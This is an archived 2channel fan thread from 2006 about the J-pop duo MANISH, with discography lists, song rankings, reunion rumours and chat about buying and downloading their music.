2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【君の】MANISH part3【空になりたい】

1 :伝説の名無しさん:2006/02/18(土) 09:52:34
前スレ、なぜか1000間近でdat落ち
テンプレは>>2以降

2 :伝説の名無しさん:2006/02/18(土) 09:57:33
Discography
-SINGLE-
1st"恋人と呼べないDistance"
2nd"声にならないほどに愛しい"
3rd"素顔のままKISSしよう"
4th"君が欲しい 全部欲しい"
5th"眠らない街に流されて"
6th"だけど 止められない/いつでも いまでも いつかは"
7th"もう誰の目も気にしない"
8th"明日のStory"
9th"走り出せLonely Night"
10th"煌めく瞬間に捕われて/眩しいくらいに…"
11th"この一瞬という永遠の中で"
12th"君の空になりたい"

3 :伝説の名無しさん:2006/02/18(土) 10:00:14
-ALBUM-
1st"Manish"
2nd"INDIVIDUAL"
3rd"Cheer!"
Best Album"MANISH BEST〜Escalation〜"
Best Album"complete of MANISH at the BEINGstudio"


4 :伝説の名無しさん:2006/02/18(土) 10:03:19
■1st album"Manish"
01 声にならないほどに愛しい
02 いつか誰かに出逢うため
03 素顔のままKISSしよう
04 君へのメロディー
05 恋人と呼べないDistance(130 Brand-New Mix)
06 素直になれない
07 DREAM AGAIN

5 :伝説の名無しさん:2006/02/18(土) 10:05:03
■2nd album"INDIVIDUAL"
01 だけど 止められない
02 走り出せLonely Night
03 明日のStory
04 ゆずれない瞬間
05 My Boy
06 もう誰の目も気にしない
07 眠らない街に流されて
08 君が欲しい 全部欲しい
09 いつでも君に会いたかった
10 ずっと見つめていたかった
11 eternal

6 :伝説の名無しさん:2006/02/18(土) 10:07:26
■3rd album"Cheer!"
01 煌めく瞬間に捕われて
02 イラナイ
03 風
04 眩しいくらいに…(Album Version)
05 せつない自由
06 この一瞬という永遠の中で
07 True Heart
08 気まぐれな空
09 翼を捜してる
10 さよならLazy Days
11 君の空になりたい

7 :伝説の名無しさん:2006/02/18(土) 10:10:50
■1st Best Album"MANISH BEST〜Escalation〜"
01 煌めく瞬間に捕われて
02 声にならないほどに愛しい
03 素顔のままKISSしよう
04 もう誰の目も気にしない
05 眠らない街に流されて
06 君が欲しい 全部欲しい
07 だけど止められない
08 君へのメロディー
09 イラナイ
10 明日へのStory
11 走り出せLonely Night
12 Will
13 風
14 It’s so Natural
15 DREAM AGAIN




8 :伝説の名無しさん:2006/02/18(土) 10:15:26
■complete of MANISH at the BEING studio
(at the BEING studioシリーズ)
01 恋人と呼べないDistance(130 Brand-New Mix)
02 声にならないほどに愛しい
03 素顔のまま KISSしよう
04 君が欲しい 全部欲しい
05 眠らない街に流されて
06 だけど止められない
07 もう誰の目も気にしない
08 明日のStory
09 走り出せLonely Night
10 煌めく瞬間に捕われて
11 この一瞬という永遠の中で
12 君の空になりたい
13 いつでも いまでも いつかは
14 ゆずれない瞬間
15 眩しいくらいに…
16 It's so Natural
<Premium Tracks>
17 夢の飛行機
18 明日に向かって

9 :伝説の名無しさん:2006/02/18(土) 10:22:08
>>1


10 :伝説の名無しさん:2006/02/18(土) 11:45:29
>>1
乙か誰かに出逢うため

11 :伝説の名無しさん:2006/02/18(土) 15:01:07
>>1
煌めく乙に捕われて

12 :伝説の名無しさん:2006/02/19(日) 21:06:38
さよならLazy Days最高

13 :伝説の名無しさん:2006/02/19(日) 22:56:30
今日久々にCheer!を聴いてみた。
やっぱ君の空になりたい、いいね。じーんとする
せつない自由、風、さよならLazy Daysもいい

14 :伝説の名無しさん:2006/02/20(月) 10:38:44
>>1
ただでさえ過疎ってるのにまた余計なことを・・・

15 :伝説の名無しさん:2006/02/20(月) 23:50:14
age

16 :1:2006/02/21(火) 00:19:58
>>14
いいじゃん別に
頑張って1000目指そう

17 :伝説の名無しさん:2006/02/21(火) 16:56:23
MANISHの曲を手掛けて欲しかったといえば・・・
作詞・・・安藤芳彦、前田亘輝(TUBE)
作曲・・・松川敏也、高山征輝(元ZYYG)、宇徳敬子、羽田一郎、五十嵐美貴(SHOW-YA)
編曲・・・高橋輸一、小澤正澄、寺島良一

18 :伝説の名無しさん:2006/02/21(火) 18:24:16
あのままひっそり消えて終了かと思ってたよ
通勤にはやはりMANISHですな

19 :たかちん:2006/02/21(火) 18:28:13
>>17には今すぐ死んでほしい

20 :伝説の名無しさん:2006/02/21(火) 23:18:36
まあ、そんなこといわないでさー
まったりいこーや。

21 :たかちん:2006/02/22(水) 00:42:21
たかちんです。
本当は田代信者です。
>>17
ごめんなさい。実現できなかったのは残念ですよね。

22 :伝説の名無しさん:2006/02/22(水) 11:08:31
本当に解散したの?復活は100%無いわけ?

23 :伝説の名無しさん:2006/02/23(木) 10:06:56
>>1 君の乙になりたい

24 :伝説の名無しさん:2006/02/23(木) 19:08:55
復活はないでしょ
今更…(=_=)終わり方があいまいだっただけにファンとしては消化不良だ!!ギザ内ヘボアーティストリストラしてMANISHを!

25 :伝説の名無しさん:2006/02/23(木) 21:50:10
MANISHの2人、デビューしたのが若いから今でも32歳くらいなんだよね2人とも。
Beならまだまだ活動できる年齢

26 :伝説の名無しさん:2006/02/24(金) 01:06:32
鬱と呼べない Distance
ロマン作戦 鬱! and 鬱!
鬱へのメロディ―
鬱にならないほどに愛しい
鬱のまま Kissしよう
鬱が欲しい全部欲しい
眠らない鬱に流されて

もう誰の鬱も気にしない
鬱のStory
鬱見せたくない
ゆずれない鬱
煌めく鬱に捕われて
この鬱という一瞬の中で
君の鬱になりたい
せつない鬱


27 :伝説の名無しさん:2006/02/24(金) 17:17:08
素顔のままKISSしようと眠らない街に流されてが1円で買えた

28 :伝説の名無しさん:2006/02/25(土) 10:11:14
松室麻衣 solo debut single
「Believe」
RZCD-34168
2006 4.23 RELEASE

01.Believe
words:Mai Matsumuro
music:Mari Nishimoto
arrangement:Yasuo Otani

02.Our Destiny
words:Mai Matsumuro
music:Tohru Watanabe
arrangement:CMJK

03.Love Emotion
words:Mai Matsumuro
music:Mai Matsumuro
arrangement:H∧L

キタ━━(゚∀゚)━━!!

29 :伝説の名無しさん:2006/02/25(土) 11:59:54
ガセネタ乙

30 :伝説の名無しさん:2006/02/26(日) 01:16:48
松室麻衣 solo debut single
「dream again」
RZCD-34168
2006 4.23 RELEASE

01.dream again
words:Mai Matsumuro
music:Mari Nishimoto
arrangement:Yasuo Otani

02.戻りたい…戻れない…
words:Mai Matsumuro
music:Tohru Watanabe
arrangement:CMJK

03.帰れない場所
words:Mai Matsumuro
music:Mai Matsumuro
arrangement:H∧L

キタ━━(゚∀゚)━━!!

31 :伝説の名無しさん:2006/02/27(月) 21:14:58
でー?

32 :伝説の名無しさん:2006/02/27(月) 22:06:48
高橋さんは五反田で焼肉屋経営してるよ。

33 :伝説の名無しさん:2006/02/27(月) 23:27:40
今度うちの姉の結婚式で
君の空になりたいを歌う。
CDもみんなに配る

34 :伝説の名無しさん:2006/02/27(月) 23:46:17
結婚式なら もう誰の目も気にしない もいいかもね

35 :伝説の名無しさん:2006/02/28(火) 17:08:12
卒業式なら「DREAM AGAIN」「BEST FRIEND」

結婚式なら「もう誰の目も気にしない」「eternal」

36 :伝説の名無しさん:2006/03/02(木) 13:28:06
age

37 :伝説の名無しさん:2006/03/04(土) 09:11:01
やっとMATBS見付けて買ったよ。明日に向かって初めて聴くけどいいね。

夢の飛行機は昔に何かのオープニングテーマで聴いたことあったけど
やっぱりこういう打ち込みポップは聴いてて元気出るね。

まだまだ未発表曲があるみたいだけど、是非出し惜しみなくリリースして下さい。5曲入り3000円でも買いますよ。<長戸さん

38 :伝説の名無しさん:2006/03/05(日) 11:19:28
同じく

39 :伝説の名無しさん:2006/03/05(日) 15:39:50
マニッシュ最高

40 :伝説の名無しさん:2006/03/05(日) 17:53:52
5曲入り3000円はぼったくりやろw

41 :伝説の名無しさん:2006/03/05(日) 23:14:13
>>40
いや、MANISHの楽曲にはそれくらいの価値はあるよ。
倖田來未や浜崎あゆみとかならぼったくりだけどなw

42 :伝説の名無しさん:2006/03/05(日) 23:17:47
高橋さんって?美鈴さんが焼肉屋を経営してるの?またまた〜
本当なら言ってみた〜い。

43 :伝説の名無しさん:2006/03/05(日) 23:23:25
あっ!ごめん言ってみたいじゃなくて、行ってみたいだ〜。

44 :伝説の名無しさん:2006/03/08(水) 19:06:43
age

45 :高橋美鈴:2006/03/09(木) 00:02:31
翼を探してる
誰もが声枯らし
傷ついても微笑んだ季節は思い出じゃない
振り出しに戻っても悔やまない投げ出さない
夢を手繰り寄せようよ
風に抱かれながら

いい曲。


46 :伝説の名無しさん:2006/03/09(木) 01:46:03
Cheer!はいろんなタイプの曲があっていい

さよならLazy Days、風、翼を探してる、君の空になりたいが特に好きだな

47 :伝説の名無しさん:2006/03/09(木) 18:20:21
うわーマニッシュすれ発見。めっさ嬉しい。
小・中時代聴きまくってたな〜。

48 :伝説の名無しさん:2006/03/11(土) 11:31:21
age

49 :伝説の名無しさん:2006/03/11(土) 19:15:20
夢の飛行機〜

50 :伝説の名無しさん:2006/03/11(土) 22:24:20
ちょww
>>45が高橋美鈴ww
今気づいた

51 :伝説の名無しさん:2006/03/11(土) 22:47:30
Cheer!ほんといいよね。
よく最後にこんな傑作を残してくれたなと思うよ。
このアルバムの製作段階での没曲はないのかな?

52 :伝説の名無しさん:2006/03/11(土) 23:59:05
結構ありそうじゃない?二人とも、今までのうちこみから生音に移行していた時期のようだしさ。ほんと声もよく伸びて充実感あふれたいいアルバムだ〜(^◇^)

ほんとだ、45高橋美鈴(笑)

53 :伝説の名無しさん:2006/03/12(日) 00:11:48
風  好きだな〜

54 :伝説の名無しさん:2006/03/12(日) 00:51:00
美鈴さーん復活してくれー 期間限定でもいいから!

55 :伝説の名無しさん:2006/03/12(日) 00:52:06
Cheer!一番いい

俺の大好きな君の空になりたい、風、さよならLazy Days、翼を探してる
が入ってるだけで既に名盤

56 :伝説の名無しさん:2006/03/12(日) 23:39:50
ニスィが秋にavex系からユニット組んでデビューするってほんとかなー?

 ガセ??

57 :伝説の名無しさん:2006/03/13(月) 00:20:40
はいはいガセガセ

















だと思うw

58 :伝説の名無しさん:2006/03/13(月) 10:21:09
もうこの手のガセネタは飽きました。

59 :伝説の名無しさん:2006/03/13(月) 16:52:54
MANISHの読み方を教えて下さい。

60 :伝説の名無しさん:2006/03/13(月) 18:29:41
>>59
マンイッシュ

61 :伝説の名無しさん:2006/03/13(月) 21:02:30
まにっしゅ。

62 :伝説の名無しさん:2006/03/13(月) 21:17:40
マニッシュですか。
どもノシ

63 :伝説の名無しさん:2006/03/13(月) 21:53:24
わかってるんなら聞くなよ・・・W

64 :伝説の名無しさん:2006/03/13(月) 23:45:07
ノシ

65 :西本麻里:2006/03/14(火) 18:24:07
ZARDが遂に初動1万台になっちゃったのね

Beingもそろそろ終盤かな

プゲラッチョ

66 :長戸:2006/03/15(水) 08:17:29
いまだに収入が5億円を越えてる俺は勝ち組

67 :伝説の名無しさん:2006/03/15(水) 14:19:57
>>66
たったそんだけ?

68 :三糞夕夏:2006/03/15(水) 17:03:32
ウフフ

69 :伝説の名無しさん:2006/03/17(金) 21:00:08
MANISH New Album
「Reprise Colors」
ZACL-50401

70 :伝説の名無しさん:2006/03/17(金) 23:38:14
ヨシ! 買った。 ついでにBeingも買ってやる。

そして MANISH 復活!

71 :伝説の名無しさん:2006/03/18(土) 00:23:18
いつの日か。

72 :伝説の名無しさん:2006/03/18(土) 00:46:50
仮に復活したとして売上レベルはどれぐらい?
100位以内には入るかもしれないけどね。

73 :伝説の名無しさん:2006/03/18(土) 14:53:34
100位以内…
多分可能

74 :伝説の名無しさん:2006/03/18(土) 23:05:37
コンプリートオブマニッシュは100位以内に入ったみたいだからね。
ま〜、滴草や高岡よりは売れるでしょ。

75 :伝説の名無しさん:2006/03/19(日) 17:27:06
MANISHが復活する夢を見てしまった・・。
夢の中で大興奮した自分が悲しい。

76 :伝説の名無しさん:2006/03/19(日) 22:56:45
>>74
ふぅ〜ん、WANDSとかT-BOLANは?
一番売れたのは、大黒か?

77 :伝説の名無しさん:2006/03/20(月) 01:17:37
大黒は確か、24時間テレビに「あぁ」で出演して
その効果が結構出てた気がする。

78 :伝説の名無しさん:2006/03/24(金) 01:03:52
age

79 :伝説の名無しさん:2006/03/27(月) 03:43:59
自分もおっさんと呼ばれる歳になったが、女性歌手で聴けるのは後にも先にもMANISHだけ!
確かに、高橋が自分の好みのルックスというのもあったけど、楽曲が全てにおいて素晴らしかったな。
もちろん今でも車中でよく聴くよ。「夢の飛行機」がかかるとVol大きくしたりしてね・・・「ずっと見つめていたかった」で何度涙を溢しそうになったか・・・orz 

80 :伝説の名無しさん:2006/03/27(月) 12:06:06
おっさんガンバレ!

81 : ◆16fwb.MIMI :2006/03/29(水) 08:34:30
てst

82 : ◆16fwb.MIMI :2006/03/29(水) 22:58:05
君の空になりたい
1000回記念age

83 :伝説の名無しさん:2006/04/02(日) 12:33:20
うーーん伸びないなー

84 :伝説の名無しさん:2006/04/02(日) 17:06:15
だって2人とも行方不明で話題がないし

85 :伝説の名無しさん:2006/04/02(日) 18:49:19
素直になれない
DREAM AGAIN
いつでも君に会いたかった

ベストに入ってないな

86 :sage:2006/04/02(日) 22:59:59
↑そう。だから、自分で作ったでしょ?MYBESTを・・・(笑)


87 :伝説の名無しさん:2006/04/03(月) 05:26:07
ムーンライト伝説を歌ってた人のスレはここでつか?

88 :伝説の名無しさん:2006/04/03(月) 16:00:55
最後のベストの「だけど 止められない」の音が
Individualの時と全然違うけど、
これってシングルバージョンなの?
それともリマスターで音良くなっただけ?

89 :伝説の名無しさん:2006/04/03(月) 17:21:02
それは俺もオモタ。
リマスタリングの効果でしょう。

90 :伝説の名無しさん:2006/04/03(月) 19:05:06
やっぱりみんな同じこと考えてるんだね
なんか嬉しいな〜
私はベストの音源が好きだな

91 :伝説の名無しさん:2006/04/03(月) 19:08:53
INDIVIDUALに入ってるだけど止められないは音悪すぎない?
サビが特に

92 :伝説の名無しさん:2006/04/03(月) 22:25:48
ちょっと音割れ気味??

93 :伝説の名無しさん:2006/04/03(月) 23:16:59
あと、君が欲しい全部欲しい は
シングル=ベストバージョンの方がいい
アルバムバージョンはギターがバキバキし過ぎだし
イントロが普通

94 :伝説の名無しさん:2006/04/03(月) 23:51:09
>>2-8
出来れば、売り上げ枚数やオリコンの最高位を書いてくれたら、ありがたい。

95 :伝説の名無しさん:2006/04/04(火) 20:59:51
MANISHってLP2使えば全曲が1枚のMDに収まりそうですか?

96 :伝説の名無しさん:2006/04/04(火) 21:39:51
>>95
無理・・・w


97 :伝説の名無しさん:2006/04/05(水) 13:43:23
>>96
thx。LP4で我慢します

98 :伝説の名無しさん:2006/04/08(土) 13:44:34
ずっと見つめていたかった

ってA面で発売しても良いくらいの出来だね
この短さが良いし

99 :伝説の名無しさん:2006/04/08(土) 19:15:17
翼を探してるは神曲

100 : ◆SIrDbni4vY :2006/04/08(土) 20:44:37
しめじ100

101 :伝説の名無しさん:2006/04/09(日) 02:40:40
ずっと見つめていたかった c/w 明日のStoryの方が良かったかもね

102 :伝説の名無しさん:2006/04/09(日) 11:48:39
>>94 どこかに貼ってなかったっけ・・??



103 :伝説の名無しさん:2006/04/09(日) 11:50:24
DREAM AGAINがぴったりな時期が過ぎて、今の時期にいい曲はなんだろう。。

104 :伝説の名無しさん:2006/04/09(日) 19:11:32
>>103

風、いつか誰かに出逢うため、君の空になりたい、気まぐれな空

とか爽やか系。

105 :伝説の名無しさん:2006/04/09(日) 19:14:36
正確な売上枚数知りたいんだけど、誰かyou大樹(売上枚数、最高順位がわかる有料サービス)に入ってる人いないかな?

Wikipediaにも掲載されてるんだけど
「恋人と呼べない〜」が49位とか、むちゃくちゃだし

106 :伝説の名無しさん:2006/04/09(日) 19:25:07
>>104 ありがとう! 

<恋人と〜>ってもっと上位?

107 :伝説の名無しさん:2006/04/09(日) 21:03:25
>>106
チャートインしなかったはず・・・

108 :伝説の名無しさん:2006/04/10(月) 00:48:39
さよならLazy Days

109 :伝説の名無しさん:2006/04/10(月) 13:03:34
MANISHのファンは年代的には25より上の人間が多そうだな。

110 :伝説の名無しさん:2006/04/10(月) 19:42:12
368 :名無しのエリー:2006/04/10(月) 19:04:55 ID:FZwVgUxC
MANISHってもし活動しててもどうせ二人ともババアだし
ルックスも歌唱力も曲の知名度も若さも夕夏の方が勝ってますから
アンチが否定しても無駄。


111 : ◆FKE8JkXwkY :2006/04/10(月) 21:13:36
しめじ111

112 :伝説の名無しさん:2006/04/10(月) 22:40:50
>>110
それキモい三枝ヲタだから

俺はGIZAで愛内・上木・滴草だけ好き。
3人共実力あるし。

113 :伝説の名無しさん:2006/04/10(月) 22:43:54
ボーカルのげじげじ眉毛が
ある日、細マユに変わった瞬間にこのユニットが好きになった人
手を上げて!

114 :伝説の名無しさん:2006/04/10(月) 22:53:48
>>113
いつ細くなったっけ?

115 :伝説の名無しさん:2006/04/10(月) 23:01:23
いつか忘れたが、Mステーションでくっきりと変わってたよ
本当の隠れファンなら分かるでしょう それくらい

キーボードはきれいだけど、きつそうだね。
その点ボーカルのひと、みすずだっけ、、
彼女は、友達とかが拝み倒せば、なんとかお願い出来そうな、、そんな良い感じだひょね?


116 :伝説の名無しさん:2006/04/10(月) 23:03:56
俺がMANISHを知ったのは2004年だから仕方ない・・・
昔の女の人はみんな眉毛濃かったからなぁ。

高橋美鈴は結構性格良さそう

117 :伝説の名無しさん:2006/04/10(月) 23:10:08
ロマン作戦GO and GO!が聴きたいんだけど
どこにも売ってねー

118 :伝説の名無しさん:2006/04/10(月) 23:14:48
>>117
つ オークション

119 :伝説の名無しさん:2006/04/11(火) 00:20:57
Dream Againの声がなんか変なのは気のせい?

120 : ◆gpDpTAdRzM :2006/04/11(火) 19:54:52
>>119
その曲の歌声だけ七緒香に似ているw

121 :伝説の名無しさん:2006/04/11(火) 23:37:13
DREAM AGAINはベストで初めて聴いたんだが
1番最後に入ってたので、これがラストシングルなんだと思い込んでた
で、声劣化したなぁって思ってたんだが
2ndシングルのC/W曲って知ってビックリ

122 :伝説の名無しさん:2006/04/12(水) 01:12:28
未発表音源集の発売まだー?
どっかにMP3転がってないかな

123 : ◆RnavnO2fug :2006/04/12(水) 20:24:26
しめじ123

124 :伝説の名無しさん:2006/04/12(水) 23:05:33
さよならLazy Days
It's so Natural

この2曲 当時のMANISHの心境が描かれているような気がしないでもない。

125 :伝説の名無しさん:2006/04/15(土) 01:36:38
>>> 115
何をお願いできるの???

なんか卑猥なことじゃないのか?
セクハラで訴えられるぞ、書類送検されるぞ

126 :伝説の名無しさん:2006/04/16(日) 09:46:16
3rdアルバムだけ持ってる。当時スラダンの「煌めく〜」目当てで買ったんだけど
煌めくよりも さよならLazy Days、君の空になりたい、風とかの方が好きになった
でも当時、スラダンで大黒摩季が歌ってるって勘違いした記憶があるな

それくらいボーカルの声が似てる

127 :伝説の名無しさん:2006/04/17(月) 00:32:12
>>>125 ???  なに言ってんだ書類送検なんかされるか。法律の知識をひけらかそうとして失敗してんじゃねーそ


128 :伝説の名無しさん:2006/04/17(月) 01:21:29
はいはいすれ違いの純情。

129 :伝説の名無しさん:2006/04/17(月) 21:38:14
>>126 高橋美鈴と声質似てるもんね。(大黒)しかも、ボイトレを大黒から受けてたみたいだから、なおさらかな。

130 :伝説の名無しさん:2006/04/19(水) 22:38:01
声似過ぎ
大黒を少し可愛くした感じ。高橋の声は

131 :伝説の名無しさん:2006/04/20(木) 19:38:22
amazonから新品で買った走り出せLonely Nightが届いた。
「涙見せたくない」最高。
まだ持ってない曲は
さよならPlastic Girl
Love Me All The Time
Oh!My Life
ロマン作戦 GO and GO!

なんだが、どれが1番良いの?

132 :伝説の名無しさん:2006/04/20(木) 21:05:38
こん中だったら俺はLove Me〜が好き。

133 :伝説の名無しさん:2006/04/21(金) 07:17:02
まだBest Friendしか聴いたことない

134 :伝説の名無しさん:2006/04/22(土) 17:28:54
風とさよならLazy Daysってシングルにしてもいいくらいだな

135 :伝説の名無しさん:2006/04/23(日) 10:54:13
イッツ ソー ナチュラル

136 :伝説の名無しさん:2006/04/23(日) 12:40:15
>>131 新規のMANISHファンですか?なんだか嬉しいな〜
ロマン作戦〜は、入手困難かもしれないけど、デビュー曲だから
聴く価値ありだと思う!!

137 :伝説の名無しさん:2006/04/23(日) 13:55:17
WANDSの曲歌ってたような…

138 :伝説の名無しさん:2006/04/23(日) 14:42:42
>>137 声にならないほどに愛しいでは?

139 :伝説の名無しさん:2006/04/23(日) 21:04:40
声にならないほどに愛しいって最高位26位で20万枚ってことは
かなりロングヒットしたんだな

140 :伝説の名無しさん:2006/04/23(日) 21:52:27
声にならないほどに愛しいってベストに入ってる方のボーカルの方が絶対良いな

141 :伝説の名無しさん:2006/04/24(月) 00:35:12
マニッシュについて
http://bubble4.2ch.net/test/read.cgi/natsumeloj/1145770224/

142 :名無し募集中。。。:2006/04/24(月) 16:35:05
>>131
俺はLove Me All The Timeでの美鈴様の喘ぎ声が好きでつ

143 :伝説の名無しさん:2006/04/24(月) 22:43:29
MANISHは永遠だ
ちょっとした休みに入ってるだけだ〜

144 :伝説の名無しさん:2006/04/25(火) 17:51:06
344おりぞん

145 :伝説の名無しさん:2006/04/25(火) 18:49:05
345

146 :伝説の名無しさん:2006/04/25(火) 20:45:54
三枝夕夏 IN db
New Single
「こんなにあなたを愛しているのにあなたは振り向いてくれない笑顔を見せてくれない」

147 :伝説の名無しさん:2006/04/25(火) 22:35:27
今からでもCD集められるかな?

148 :伝説の名無しさん:2006/04/25(火) 23:32:54
うん。まだ揃えられるよ。ヤフオクに、恋人と〜が出品されてたね
久々に出た貴重品!持ってない人はチャンスかもね。

149 :伝説の名無しさん:2006/04/26(水) 07:37:23
sage

150 :伝説の名無しさん:2006/04/26(水) 14:11:14
公式サイトから歌詞全部いただきました

151 :伝説の名無しさん:2006/04/26(水) 19:08:05
↑あの歌詞カード、誤字もあるので、要注意!

152 :伝説の名無しさん:2006/04/26(水) 21:01:39
マジかよ!
ジャケ&歌詞、全部iPodに入れちゃったのに

153 :伝説の名無しさん:2006/04/27(木) 01:00:03
ま、それはそれでいいじゃない(^◇^)

154 :伝説の名無しさん:2006/04/27(木) 01:28:08
さよならPlastic Girlってバラード?

155 :伝説の名無しさん:2006/04/27(木) 07:24:51
ゴスペル。

156 :伝説の名無しさん:2006/04/27(木) 23:10:54
気まぐれな空みたいに〜♪

157 :伝説の名無しさん:2006/04/29(土) 08:51:11
もう誰の目も気にしない〜♪

158 :伝説の名無しさん:2006/04/30(日) 10:54:52
過去ログ見ると
特に人気のある曲は

君の空になりたい
ずっと見つめていたかった
ゆずれない瞬間

あたりかな?

ちなみに俺は
@君の空になりたい
Aいつか誰かに出逢うため
Bずっと見つめていたかった
Cせつない自由
Dゆずれない瞬間

の順。

159 :伝説の名無しさん:2006/05/03(水) 22:13:22
1 君の空になりたい
2 眠れない街に流されて
3 もう誰の目も気にしない
4 eternal
5 ゆずれない瞬間

160 :伝説の名無しさん:2006/05/05(金) 09:51:17
スラダンの「煌めく〜」目当てでcomplete of MANISH買ってみたんだけど
シングル曲は「恋人と呼べないDistance」から「君の空になりたい」まで
全部良いね。煌めく〜より良い曲たくさんあった。
オリジナルアルバムをそろえようと思うんだけど何枚出てるの?

161 :伝説の名無しさん:2006/05/05(金) 10:49:03
シングル12枚、オリジナル3枚、ベスト2枚

162 :伝説の名無しさん:2006/05/05(金) 13:03:10
>>161
サンクス
俺中古は苦手なんでamazonで注文するわ

163 :伝説の名無しさん:2006/05/05(金) 16:18:11
ほんとに作曲してたんだろうか?
あれほどの楽曲がかければもっと作家として活躍できるはずだが・・・
オダテツがゴーストやってたのでは?との疑惑を感じてしまう

164 :伝説の名無しさん:2006/05/05(金) 19:12:21
>>163
「もう誰の目も気にしない」「さよならLazy Days」とか
織田哲郎にひけをとらないキャッチーさだと思う

それにしても西本の書くバラードって凄くイイ(・∀・)!

165 :伝説の名無しさん:2006/05/06(土) 14:04:27
君の空になりたい大人気だね。不評なのが多い栗林の曲にしては珍しい。
ちなみに俺は眠らない街に流されてのアレンジが格好良くて好きだ

166 :伝説の名無しさん:2006/05/06(土) 14:16:40
私も便乗

1 だけど止められない
サビが大好き。スタンダードっぽさも好き
2 君の空になりたい
アレンジが神がかってる。特にアウトロの1分間が最高
3 いつか誰かに出逢うため
イントロが豪快で美しくて最高。短くてあっさりしてるから何度も聴きたくなる
4 風
古井がいい仕事してる。
5 さよならLazy Days
B'zが歌ってても違和感なさそう。シングル曲になってもいいくらいの出来。

アルバムはCheer!が1番好きかな

167 :伝説の名無しさん:2006/05/07(日) 14:24:46
iTunesでWillを購入したんだけど良いね!
俺の中で5位以内に入る

168 :伝説の名無しさん:2006/05/07(日) 15:25:37
iTunesにマニッシュ売ってるのか・・・
Willって西本作曲のやつだよな?眠らない街〜のC/wの。

169 :伝説の名無しさん:2006/05/08(月) 02:14:11
Shinging In the Rain

170 :伝説の名無しさん:2006/05/09(火) 22:22:20
走り出せLonely Night♪

171 :伝説の名無しさん:2006/05/09(火) 23:16:30
美鈴タソ ハァハァ

172 :伝説の名無しさん:2006/05/12(金) 22:54:27
あげ

173 :伝説の名無しさん:2006/05/13(土) 00:37:40
age

174 :伝説の名無しさん:2006/05/13(土) 11:25:04
引越し後、シングル2枚しか見つからない。
どこに行っちゃったのだろう・・・
ベスト版買おうかな、と思って店を周ったが無いし。
iTunes Music Storeで買っちゃおうかな・・・。

175 :伝説の名無しさん:2006/05/13(土) 15:11:33
>>174
iTunesはcomplete of MANISHとエスカレーションしか売ってないよ
オリアル3枚はあるの?

176 :Beヲタ ◆UV.NHkBV.g :2006/05/13(土) 22:11:41
iTunesで眠らない街に流されて ダウンロードしたよ〜

コンビニで5000円分のiTunesカード買ったの。

complete of MANISHとエスカレーションってどっちがお奨め?

177 :Beヲタ ◆UV.NHkBV.g :2006/05/13(土) 22:14:30
連投ゴメンw

眠らない街に流されて イイ(・∀・)!!デスネ
懐かしすぎる・・・ドラマ見てたなぁー
MANISH最高!!!

178 :伝説の名無しさん:2006/05/13(土) 22:34:08
>>176
completeかな
だけど、エスカレーションに入ってる
風、イラナイ、Will、DREAM AGAINもかなりオススメなので
どっちも購入することをオススメする

179 :伝説の名無しさん:2006/05/14(日) 08:32:18
>>178
Willいいね。
あの曲すきだなぁ。

180 :伝説の名無しさん:2006/05/14(日) 12:58:45
最後のチャンス

信じてる

自分を見つけた〜〜♪

181 :伝説の名無しさん:2006/05/14(日) 15:17:43
MANISHの作品全曲ダウンロードできるようにして欲しい!

182 :伝説の名無しさん:2006/05/14(日) 15:20:09
「素直になれない」を聞くたびに思うこと

三つ子の属性百まで

183 :伝説の名無しさん:2006/05/14(日) 18:47:40
>>182
どういう意味?

184 :伝説の名無しさん:2006/05/15(月) 22:21:30
ら・し・く♪

185 :伝説の名無しさん:2006/05/16(火) 21:09:24
complete of MANISH良いね
iTunesで買ったけどお得な気分

186 :伝説の名無しさん:2006/05/17(水) 02:41:40
自分にとって、
・ずっと見つめていたかった
・さよなら Lazy Days
・夢の飛行機

この三曲はまさに神曲です!

187 :伝説の名無しさん:2006/05/17(水) 12:38:10
動画upしました

Manish 明日のStory
http://g2203.immex.jp/test/read.cgi/prot/1146051324/115

188 :伝説の名無しさん:2006/05/17(水) 12:40:15
>>187
ネ申thx!
帰ったら落とさせていただきます

189 :伝説の名無しさん:2006/05/17(水) 12:41:19
俺にとっての神曲は

君の空になりたい

190 :伝説の名無しさん:2006/05/17(水) 22:18:25
>>187
乙!

191 :伝説の名無しさん:2006/05/18(木) 07:26:25
10年くらい忘れてたんですが、さっき思い出してやってきました(´・ω・`)ノシ
昔の曲探って聞きましたがやっぱいいですね・・・・

192 :伝説の名無しさん:2006/05/18(木) 11:59:33
↑よくぞ思い出して来てくださいましたm(__)m
MANISH、、きっともっと世に出すはずの作品があっただろうなと思うとかなり悔やまれますよね。。

193 :伝説の名無しさん:2006/05/19(金) 18:34:39
恋人と呼べないDistance

194 :伝説の名無しさん:2006/05/19(金) 19:35:44
BEING GIZA STUDIOでもう誰の目も気にしないの着フルダウンロードしたけど
MANISHのお2人に印税入るの?入るよね・・・

195 :伝説の名無しさん:2006/05/19(金) 20:17:28
>>194
入らないよ・・・・(´Д⊂グスン

196 :伝説の名無しさん:2006/05/20(土) 00:20:38
>>187
遅かった・・・・(´Д⊂グスン

197 :伝説の名無しさん:2006/05/21(日) 12:52:40
>>187の動画
128番目でいただきました。

198 :伝説の名無しさん:2006/05/21(日) 16:04:16
128人もDownloadしたってこと?すげー

199 :伝説の名無しさん:2006/05/21(日) 23:18:31
高橋美鈴の歌詞好きなんだけど異色?

200 : ◆pcVGfagGOE :2006/05/22(月) 13:09:50
死ねじ200

201 :伝説の名無しさん:2006/05/22(月) 13:16:08
以前、画箱で君の空になりたい&明日のストーリーともう1曲なんだか忘れたけどUPされてたよ。もちろんいただきましたけど(笑)たぶん今も残ってるんじゃないかなー?たしか90年代ってカテゴリーだったけど。見てみ!

202 :伝説の名無しさん:2006/05/22(月) 23:04:24
眠らない街に流されてがうpされてたね。
でも画箱にその板はもうないよ。

203 :伝説の名無しさん:2006/05/25(木) 22:54:18
くぁlsldxslsl

204 :伝説の名無しさん:2006/05/26(金) 19:01:26
意味不明〜

205 :伝説の名無しさん:2006/05/27(土) 00:28:35
ダウンロードが170人超えてるw
MANISHファンてまだ多いな。
リリースしたら今いる奴らより売れるんじゃないか

206 :伝説の名無しさん:2006/05/27(土) 13:57:59
今いる奴らってBeingで?

207 :伝説の名無しさん:2006/05/27(土) 19:55:25
↑いや、くだらないのが多いGIZAも含むでしょ・・

208 :伝説の名無しさん:2006/05/29(月) 13:07:58
北原愛子と同じくらいかな

209 :伝説の名無しさん:2006/05/29(月) 23:45:05
